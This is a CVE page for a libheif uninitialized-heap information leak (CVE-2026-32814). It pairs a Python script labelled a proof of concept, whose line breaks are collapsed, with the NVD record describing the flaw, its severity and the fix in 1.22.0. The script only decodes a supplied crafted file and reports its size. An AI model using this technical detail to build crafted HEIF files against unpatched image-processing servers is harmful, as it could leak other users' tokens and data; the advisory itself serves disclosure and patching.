CVE-2026-32814

import pyheif import sys # PoC for CVE-2026-32814 # This script attempts to decode a crafted HEIF file to trigger the uninitialized memory read. # It requires a vulnerable version of libheif (< 1.22.0). def check_memory_leak(filepath): try: # Read the HEIF file using the vulnerable library heif_file = pyheif.read(filepath) # In a vulnerable environment, the pixel data may contain uninitialized heap memory # instead of just black or error indicators. print(f"[+] Image decoded successfully: {heif_file.mode} {heif_file.size}") # Check if pixel data looks suspicious (e.g., high entropy indicating random heap data) # This is a simplified check; real analysis involves inspecting the raw bytes. data = heif_file.data print(f"[+] Data length: {len(data)} bytes") print("[!] If running on libheif < 1.22.0, this data might contain heap memory leaks.") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python poc.py <crafted_file.heic>") else: check_memory_leak(sys.argv[1])

{"cve": {"id": "CVE-2026-32814", "sourceIdentifier": "[email protected]", "published": "2026-05-19T21:16:42.223", "lastModified": "2026-05-20T14:16:41.740", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and prior, when decoding a HEIF grid image with strict_decoding=false (the default), a corrupted tile silently fails to decode and the library returns heif_error_Ok with no indication of failure, leading to an uninitialized heap memory information leak. The canvas is allocated via create_clone_image_at_new_size() → plane.alloc() → new (std::nothrow) uint8_t[allocation_size] which does not zero the memory; only the alpha plane is explicitly initialized via fill_plane(), so the Y, Cb, and Cr planes contain whatever was previously at that heap address. The failed tile's region of the canvas is never written. It retains uninitialized heap data that is delivered to the caller as decoded pixel values (4,096 bytes per Y/Cb/Cr plane = 12,288+ bytes total). Any application using libheif to decode grid-based HEIF/AVIF files with default settings is vulnerable: a crafted .heic or .avif file causes 4,096+ bytes of heap memory to appear as pixel values in the decoded image, and the calling application receives heif_error_Ok, so it has no indication the output contains heap garbage. In server-side image processing, an uploaded crafted HEIF decoded and re-encoded (e.g., as PNG/JPEG for thumbnails, CDN, social media) can leak cross-user data such as auth tokens, database results, and other users' image data. This issue has been fixed in version 1.22.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-908"}]}], "references": [{"url": "https://github.com/strukturag/libheif/releases/tag/v1.22.0", "source": "[email protected]"}, {"url": "https://github.com/strukturag/libheif/security/advisories/GHSA-4m8r-34pg-rvwc", "source": "[email protected]"}, {"url": "https://github.com/strukturag/libheif/security/advisories/GHSA-4m8r-34pg-rvwc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}